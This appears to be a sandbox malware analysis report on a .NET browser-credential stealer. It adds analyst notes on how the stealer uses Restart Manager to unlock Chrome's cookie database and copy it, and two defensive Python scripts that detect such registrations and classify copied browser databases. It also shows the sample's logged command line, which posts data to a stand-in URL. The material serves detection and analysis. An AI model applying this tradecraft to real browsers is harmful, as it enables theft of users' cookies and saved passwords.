File name: ap2.exe.bin
Full analysis: https://app.any.run/tasks/fde28a0e-0374-40f7-8621-2d10bd645564
Verdict: Malicious activity
Analysis date: February 13, 2024, 13:56:03
OS: Windows 10 Professional (build: 19044, 64 bit)
MIME: application/x-dosexec
File info: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
MD5: 578F549C0B0AB0D89B20C0E013F6F191
SHA1: 181903232313A98AFF0997DF59A12C6213C9BF6F
SHA256: 556C1A7D3F1079F58CDC2BAE4EEF63FFEB6C75D7B262DC502D87CF54760785A7
SSDEEP: 1536:+2s3arn0Btob8WhF4FHsfxq8rlevVQyli/0003fEimbyxKBJFqMd:Iob8YOhaxqlQEi/CCqMd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • ap2.exe.bin.exe (PID: 2944)
    • Steals credentials from Web Browsers

      • ap2.exe.bin.exe (PID: 2944)
    • Actions look like stealing of personal data

      • ap2.exe.bin.exe (PID: 2944)
  • SUSPICIOUS

    • Searches for installed software

      • ap2.exe.bin.exe (PID: 2944)
  • INFO

    • Checks supported languages

      • ap2.exe.bin.exe (PID: 2944)
    • Reads the computer name

      • ap2.exe.bin.exe (PID: 2944)
    • Reads product name

      • ap2.exe.bin.exe (PID: 2944)
    • Reads Environment values

      • ap2.exe.bin.exe (PID: 2944)
    • Checks proxy server information

      • ap2.exe.bin.exe (PID: 2944)
    • Reads the machine GUID from the registry

      • ap2.exe.bin.exe (PID: 2944)
    • Creates files or folders in the user directory

      • ap2.exe.bin.exe (PID: 2944)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (72.2)
.scr | Windows screen saver (12.9)
.dll | Win32 Dynamic Link Library (generic) (6.4)
.exe | Win32 Executable (generic) (4.4)
.exe | Generic Win/DOS Executable (1.9)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2090:05:16 05:54:02+00:00 (not a real build time: compilers that produce deterministic .NET builds store a content hash in this PE field, so out-of-range dates are normal for such binaries and are not by themselves evidence of header tampering)
ImageFileCharacteristics: Executable, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 48 (the value the Roslyn C#/VB compilers write)
CodeSize: 106496
InitializedDataSize: 1536
UninitializedDataSize: -
EntryPoint: 0x1be7e
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows command line
FileVersionNumber: 1.0.0.0
ProductVersionNumber: 1.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
Comments: -
CompanyName: -
FileDescription: ConsoleApp
FileVersion: 1.0.0.0
InternalName: pg20.exe
LegalCopyright: Copyright © 2024
LegalTrademarks: -
OriginalFileName: pg20.exe
ProductName: ConsoleApp
ProductVersion: 1.0.0.0
AssemblyVersion: 1.0.0.0
No data.
All screenshots are available in the full report
Total processes: 125
Monitored processes: 2
Malicious processes: 1
Suspicious processes: 0

Behavior graph

start -> ap2.exe.bin.exe -> conhost.exe (no specs)

Process information

PID 956: conhost.exe (parent: ap2.exe.bin.exe)
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

PID 2944: ap2.exe.bin.exe (parent: explorer.exe)
CMD: "C:\Users\admin\Desktop\ap2.exe.bin.exe" 1234 http://www.example.com
Path: C:\Users\admin\Desktop\ap2.exe.bin.exe
User: admin
Integrity Level: MEDIUM
Description: ConsoleApp
Exit code: 0
Version: 1.0.0.0
Modules (images):
c:\users\admin\desktop\ap2.exe.bin.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll

Analyst note: the two arguments (1234 and http://www.example.com) are the ones the sample was launched with in this run. The only HTTP requests attributed to PID 2944 in the network section are POSTs to http://www.example.com/, which is consistent with the sample taking its upload target from its command line; re-run it with a controlled URL to capture what it sends. conhost.exe is started by Windows for every console application and is not an indicator on its own. mscoree.dll in the module list is the .NET runtime shim, matching the "Mono/.Net assembly" file type.
Total events: 1 655
Read events: 1 619
Write events: 24
Delete events: 12

Modification events

All events below are by PID 2944 (ap2.exe.bin.exe) under the key HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000:

write Owner = 800B0000044E166D845EDA01
write SessionHash = 70D1DC2AD113971AC4053DB24307BBFB626FF626E5DF8CF792034B1F384401BF
write Sequence = 1
write RegFiles0000 = C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
write RegFilesHash = 54851FC83D6080E1124EDDE295F194B7870A848DF3838999876AC95AB3AB4693
delete value RegFilesHash (value logged: the same 32 bytes written above, rendered by the report as UTF-16 text)
delete value RegFiles0000 = C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
delete value Sequence
delete value SessionHash (value logged: the same 32 bytes written above, rendered by the report as UTF-16 text)
delete value Owner

Analyst note: this key layout (Owner, SessionHash, Sequence, RegFilesNNNN and RegFilesHash under RestartManager\SessionNNNN) is written by the Windows Restart Manager API (RmStartSession / RmRegisterResources in rstrtmgr.dll) and removed again by RmEndSession. A process registers a file with Restart Manager to learn which processes hold it open, and can then ask Restart Manager to shut those processes down. The only file registered here is Chrome's cookie database, which Chrome holds open while it runs; registering it is how a stealer finds and terminates the browser so the locked SQLite file can be copied, and it is the concrete artifact behind the "Steals credentials from Web Browsers" signature above. Legitimate installers also use Restart Manager, but they register their own binaries, not browser profile files, so a detection should key on the registered path rather than on the key alone.
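The detection logic just described, as an added example (not part of the ANY.RUN report): it parses registry modification events of the shape shown above, groups the RegFilesNNNN registrations per Restart Manager session, and flags any session that registered a browser cookie or credential store. The pipe-separated input format, the sample lines (the report's events plus an assumed Login Data registration and a benign installer for contrast) and the browser path patterns are constructed assumptions; adapt parse_event() to your own source (Sysmon Event ID 13, EDR telemetry or a sandbox export).

```python
"""Flag Restart Manager sessions that register browser credential/cookie stores."""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass

# Constructed sample events in the form PID|process|key|operation|value name|value.
# The first six mirror the report (plus an assumed Login Data registration); the
# last is a benign installer registering its own DLL, which must not be flagged.
SAMPLE_EVENTS = [
    r"2944|ap2.exe.bin.exe|HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000|write|Owner|800B0000044E166D845EDA01",
    r"2944|ap2.exe.bin.exe|HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000|write|Sequence|1",
    r"2944|ap2.exe.bin.exe|HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000|write|RegFiles0000|C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies",
    r"2944|ap2.exe.bin.exe|HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000|write|RegFiles0001|C:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"2944|ap2.exe.bin.exe|HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000|write|RegFilesHash|54851FC83D6080E1124EDDE295F194B7870A848DF3838999876AC95AB3AB4693",
    r"2944|ap2.exe.bin.exe|HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000|delete value|RegFiles0000|",
    r"5120|setup.exe|HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0001|write|RegFiles0000|C:\Program Files\Vendor\app.dll",
]

SESSION_KEY = re.compile(r"\\RestartManager\\Session\d{4}$", re.I)
REGFILE_NAME = re.compile(r"^RegFiles\d{4}$", re.I)   # RegFilesHash deliberately excluded

# Files a stealer registers to evict the browser from its locked databases.
# Chromium-family browsers (Chrome, Edge, Brave, Opera, Vivaldi) share these names
# under "...\User Data\<Profile>\"; Firefox keeps its stores under Profiles\<id>\.
BROWSER_STORE = [
    re.compile(r"\\User Data\\.+\\(Cookies|Login Data|Web Data|History)$", re.I),
    re.compile(r"\\Mozilla\\Firefox\\Profiles\\.+\\(cookies\.sqlite|logins\.json|key4\.db|places\.sqlite)$", re.I),
]


@dataclass
class Finding:
    pid: int
    process: str
    session_key: str
    browser_files: list[str]


def is_browser_store(path: str) -> bool:
    return any(p.search(path) for p in BROWSER_STORE)


def parse_event(line: str):
    """Split one pipe-separated event; returns None for lines that do not fit."""
    parts = line.split("|", 5)
    if len(parts) != 6 or not parts[0].isdigit():
        return None
    pid, proc, key, op, name, value = parts
    return int(pid), proc, key, op.strip().lower(), name, value


def analyze_events(lines) -> list[Finding]:
    """Group RegFilesNNNN writes per (pid, process, session key) and report every
    session that registered at least one browser cookie/credential store."""
    registered: dict[tuple, list[str]] = defaultdict(list)
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        pid, proc, key, op, name, value = ev
        if op != "write" or not SESSION_KEY.search(key) or not REGFILE_NAME.match(name):
            continue
        registered[(pid, proc, key)].append(value)
    findings = []
    for (pid, proc, key), files in registered.items():
        hits = [f for f in files if is_browser_store(f)]
        if hits:
            findings.append(Finding(pid, proc, key, hits))
    return findings


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f"PID {f.pid} ({f.process}) registered browser stores via {f.session_key}:")
        for path in f.browser_files:
            print("   ", path)
```

Only the write of a RegFilesNNNN value is scored; the Owner, Sequence and hash values and the later deletes are ignored, since the session is torn down whether the call came from a stealer or an installer. The same logic maps directly onto a Sysmon rule on RegistryEvent for TargetObject ending in RestartManager\Session*\RegFiles* with Details matching the browser paths.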
Executable files: 0
Suspicious files: 7
Text files: 3
Unknown types: 4

Dropped files (only the files shown on the summary page are listed; the counts above cover 14 files)

All dropped by PID 2944, ap2.exe.bin.exe:

C:\Users\admin\AppData\Roaming\8ea3ab06-0b6a-4f5a-becb-a445990e0170 (sqlite)
MD5: 1E1F96F03DCB32CBEDE6A33AF67A44A7
SHA256: B6DCEC10039FBA99019A6DE818D433847EFAD62FAE59851E328EC42396DFD9CB

C:\Users\admin\AppData\Roaming\e475eb0b-1e2b-4db1-92c3-d14783152129 (sqlite)
MD5: D1E2CC958F3468CD339F7CF98054155A
SHA256: B8D3722E417B1B55A84E56B3F0EC629B1B6FD49449825B7E8CBA2B4C43375D25

C:\Users\admin\AppData\Roaming\70ff8ac4-df69-41dd-9d07-1d0d74273b90 (sqlite)
MD5: 8D34776FC1EACFD6ABA3A108CBF0FB8F
SHA256: 2EAD1DB169EFF6E2F2390A4D9440700740FDD012B681A94C60AEC0B378D8FE56

C:\Users\admin\AppData\Roaming\cb6c9bc7-71c9-4cbb-8f42-915699b1f742 (sqlite)
MD5: DEF0831A3EBF657C17EAD677A282B855
SHA256: BACA43D995D5591730EFA286EC9CDB537AB3C12A9A58C93461DD470D128AAED0

C:\Users\admin\AppData\Roaming\8214e2cc-2bb4-463a-9a19-08b03bb329ec (sqlite)
MD5: 6168CB69AD6E0632ECC72B426935525B
SHA256: 8F2B9ECF4559FD208046D653370BD577F4793C4BB7CE3B8E00B90E3FC00FA478

C:\Users\admin\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\ap2.exe.bin.exe.log (text)
MD5: 7326F06814CC423B8DA98B318D2A341A
SHA256: 3FDAE5FAC36077B6190B2F5D8BC11575741DEA0C87A7781D47F1BB6A0F878D61

Analyst note: five SQLite files with random GUID names written straight into %APPDATA% is the pattern of a stealer copying browser databases to a scratch location before reading them (the copy sidesteps the browser's lock and leaves the original untouched); the Restart Manager events above show which file it was after. Which browser store each copy corresponds to can be confirmed from the tables inside it, since the names carry no hint. The CLR_v2.0\UsageLogs entry is written by the .NET Framework 2.0/3.5 runtime, so the assembly runs on that runtime rather than on .NET Framework 4.x.
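A triage helper for exactly this situation, added as an example (not part of the ANY.RUN report and not the sample's code): given GUID-named, extension-less files like the ones above, it checks the SQLite magic, opens each file read-only and matches its tables and columns against schema fingerprints to say whether it is a Chromium Cookies copy, a Login Data copy, and so on. The fingerprint table and column names are assumptions based on current Chromium and Firefox profile schemas, and build_samples() constructs throwaway databases for demonstration; the actual dropped files are not on this page.

```python
"""Identify which browser database each dropped SQLite copy is, from its schema."""
import os
import sqlite3
import tempfile
from pathlib import Path

SQLITE_MAGIC = b"SQLite format 3\x00"   # first 16 bytes of every SQLite 3 file

# label -> (table that must exist, columns that table must have).
# Assumed from current Chromium / Firefox profile schemas; extend as needed.
FINGERPRINTS = {
    "chromium_cookies":  ("cookies",      {"host_key", "name", "encrypted_value"}),
    "chromium_logins":   ("logins",       {"origin_url", "username_value", "password_value"}),
    "chromium_web_data": ("credit_cards", {"card_number_encrypted"}),
    "firefox_cookies":   ("moz_cookies",  {"host", "name", "value"}),
    "firefox_places":    ("moz_places",   {"url", "title"}),
}


def classify_sqlite(path: str) -> str:
    """Return a fingerprint label, 'sqlite_unknown', or 'not_sqlite'."""
    with open(path, "rb") as fh:
        if fh.read(len(SQLITE_MAGIC)) != SQLITE_MAGIC:
            return "not_sqlite"
    # mode=ro so evidence is never modified; sqlite3 only accepts that flag via a URI.
    uri = Path(path).resolve().as_uri() + "?mode=ro"
    con = sqlite3.connect(uri, uri=True)
    try:
        tables = {row[0] for row in con.execute(
            "SELECT name FROM sqlite_master WHERE type = 'table'")}
        for label, (table, needed) in FINGERPRINTS.items():
            if table not in tables:
                continue
            cols = {row[1] for row in con.execute(f'PRAGMA table_info("{table}")')}
            if needed <= cols:
                return label
        return "sqlite_unknown"
    finally:
        con.close()


def _make_db(path: str, script: str) -> None:
    con = sqlite3.connect(path)
    con.executescript(script)
    con.close()


def build_samples(directory: str) -> dict:
    """Construct three extension-less files like the dropped ones: a Chromium Cookies
    copy, a Chromium Login Data copy and a non-SQLite blob. Returns label -> path."""
    cookies = os.path.join(directory, "copy-a")
    _make_db(cookies,
             "CREATE TABLE meta(key TEXT PRIMARY KEY, value TEXT);"
             "CREATE TABLE cookies(creation_utc INTEGER, host_key TEXT, name TEXT,"
             " value TEXT, encrypted_value BLOB, path TEXT);"
             "INSERT INTO cookies VALUES (0, '.example.com', 'sid', '', X'763130AA', '/');")
    logins = os.path.join(directory, "copy-b")
    _make_db(logins,
             "CREATE TABLE logins(origin_url TEXT, username_value TEXT,"
             " password_value BLOB, date_created INTEGER);"
             "INSERT INTO logins VALUES ('https://example.com/', 'alice', X'763130BB', 0);")
    blob = os.path.join(directory, "copy-c")
    with open(blob, "wb") as fh:
        fh.write(b"\x00" * 64)   # not SQLite at all
    return {"cookies": cookies, "logins": logins, "blob": blob}


def demo() -> dict:
    """Build the constructed samples in a temp dir and classify each one."""
    with tempfile.TemporaryDirectory() as tmp:
        return {label: classify_sqlite(p) for label, p in build_samples(tmp).items()}


if __name__ == "__main__":
    for label, kind in demo().items():
        print(f"{label}: {kind}")
```

Run it against the real dropped files by calling classify_sqlite() on each path from a copy of the sandbox's file dump. Matching on table plus required columns rather than table name alone avoids mislabeling a lookalike database, and the read-only URI keeps the hashes of the evidence files unchanged.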
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 14
TCP/UDP connections: 6
DNS requests: 3
Threats: 0

HTTP requests (PID / process, method, HTTP code, IP, URL, CN, type, size, reputation; fields the summary page does not show are marked -)

[PID not shown] GET 200 20.223.35.26:443 https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=310091&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:AC7699B0-48EA-FD22-C8DC-06A02098A0F0&ctry=US&time=20240213T135608Z&lc=en-US&pl=en-US&idtp=mid&uid=9115d6d1-9f4e-4053-9297-2a8c833b3912&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=f133d543bf214eda862ea54abd0ab6ed&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&currsel=133529005600000000&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19044.1288&disphorzres=1280&dispsize=15.3&dispvertres=720&fosver=16299&isu=0&lo=3384355&metered=false&nettype=ethernet&npid=sc-310091&oemName=DELL&oemid=DELL&ossku=Professional&prevosver=15063&rver=2&smBiosDm=DELL&stabedgever=111.0.1661.62&tl=2&tsu=774885&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=2 | CN: unknown | type: - | size: 1.34 Kb | reputation: -
[PID not shown] POST 200 20.190.159.23:443 https://login.live.com/RST2.srf | CN: unknown | type: xml | size: 9.93 Kb | reputation: -
[PID not shown] POST 200 20.190.159.23:443 https://login.live.com/RST2.srf | CN: unknown | type: xml | size: 9.93 Kb | reputation: -
[PID not shown] POST 200 40.126.31.73:443 https://login.live.com/RST2.srf | CN: unknown | type: - | size: 9.93 Kb | reputation: -
[PID not shown] POST - 20.190.159.68:443 https://login.live.com/RST2.srf | CN: unknown | type: - | size: - | reputation: -
[PID 1764, backgroundTaskHost.exe] GET 200 20.223.36.55:443 https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=88000045&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:AC7699B0-48EA-FD22-C8DC-06A02098A0F0&ctry=US&time=20240213T135608Z&lc=en-US&pl=en-US&idtp=mid&uid=9115d6d1-9f4e-4053-9297-2a8c833b3912&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=1e5c0c630b1a451a83f29065cc461be0&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&currsel=137271744000000000&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19044.1288&disphorzres=1280&dispsize=15.3&dispvertres=720&fosver=16299&isu=0&lo=3384355&metered=false&nettype=ethernet&npid=sc-88000045&oemName=DELL&oemid=DELL&ossku=Professional&prevosver=15063&smBiosDm=DELL&stabedgever=111.0.1661.62&tl=2&tsu=774885&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=&svoffered=2 | CN: unknown | type: binary | size: 3.14 Kb | reputation: -
[PID not shown] POST 200 20.190.159.0:443 https://login.live.com/RST2.srf | CN: unknown | type: - | size: 10.9 Kb | reputation: -
[PID 2944, ap2.exe.bin.exe] POST 200 93.184.216.34:80 http://www.example.com/ | CN: unknown | type: html | size: 1.23 Kb | reputation: unknown
[PID not shown] GET - 40.127.169.103:443 https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19044.1288/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.1288&MK=DELL&MD=DELL | CN: unknown | type: - | size: - | reputation: -
[PID 2944, ap2.exe.bin.exe] POST 200 93.184.216.34:80 http://www.example.com/ | CN: unknown | type: html | size: 1.23 Kb | reputation: unknown

Analyst note: of the 14 HTTP requests counted, only the two POSTs to http://www.example.com/ are attributed to the sample (PID 2944), and www.example.com is the URL passed on its command line; the 1.23 Kb html reply is consistent with example.com's placeholder page, so nothing here tells you what was uploaded. The arc.msn.com, login.live.com and slscr.update.microsoft.com traffic is Windows background activity (content delivery, Microsoft account token service and the Update service locator) from other processes and should not be treated as indicators for this sample. Confirm the POST bodies from the PCAP in the full report before deriving network signatures.

Connections (PID / process, IP, domain, ASN, CN, reputation; fields the summary page does not show are marked -)

[PID 4, System] 192.168.100.255:137 | - | - | - | whitelisted
[PID 1764, backgroundTaskHost.exe] 20.223.36.55:443 | arc.msn.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown
[PID 4, System] 192.168.100.255:138 | - | - | - | whitelisted
[PID 2944, ap2.exe.bin.exe] 93.184.216.34:80 | www.example.com | EDGECAST | US | whitelisted
[PID 5300, SIHClient.exe] 20.114.59.183:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | unknown

DNS requests (domain, resolved IP, reputation)

arc.msn.com -> 20.223.36.55 (whitelisted)
www.example.com -> 93.184.216.34 (whitelisted)
slscr.update.microsoft.com -> 20.114.59.183 (whitelisted)

Threats

No threats detected
No debug info